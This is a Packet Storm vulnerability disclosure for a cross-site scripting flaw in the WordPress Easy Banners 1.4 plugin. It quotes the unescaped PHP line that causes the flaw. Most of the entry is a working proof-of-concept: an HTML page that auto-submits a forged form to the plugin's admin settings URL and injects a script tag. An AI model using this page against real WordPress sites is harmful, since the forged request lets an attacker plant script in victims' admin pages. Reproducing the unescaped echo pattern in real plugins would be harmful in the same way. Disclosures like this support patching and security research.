WordPress Easy Banners 1.4 Cross Site Scripting

2014-06-29T00:00:00
ID PACKETSTORM:127293
Type packetstorm
Reporter ACC3SS
Modified 2014-06-29T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Wordpress easy-banners.1.4 Cross Site Scripting  
  
# Exploit Author : Ashiyane Digital Security Team  
  
# Vendor Homepage : http://wordpress.org/plugins/easy-banners/  
  
# Software Link : http://downloads.wordpress.org/plugin/easy-banners.1.4.zip  
  
# Date : 2014-06-28  
  
# Tested on : Windows 7 / Mozilla Firefox  
  
######################  
  
# Location :   
http://localhost/wp-admin/options-general.php?page=easy-banners.php  
  
######################  
  
# Vulnerable code :  
  
<input type="hidden" name="name" id="name" value="<?php echo   
$row['name']; ?>" />  
  
  
######################  
  
Exploit Code:  
  
<html>  
<body>  
<form name="form1" method="post"   
action="http://localhost/wp-admin/options-general.php?page=easy-banners.php">  
<table class="widefat" style="width: 50%;">  
<input type="hidden" name="name" id="name" size="55" maxlength="250"   
value='"/><script>alert(1);</script>'/>  
<script language="Javascript">  
setTimeout('form1.submit()', 1);  
</script>  
</form>  
</body>  
</html>  
  
  
#####################  
  
Discovered By : ACC3SS  
  
#####################  
`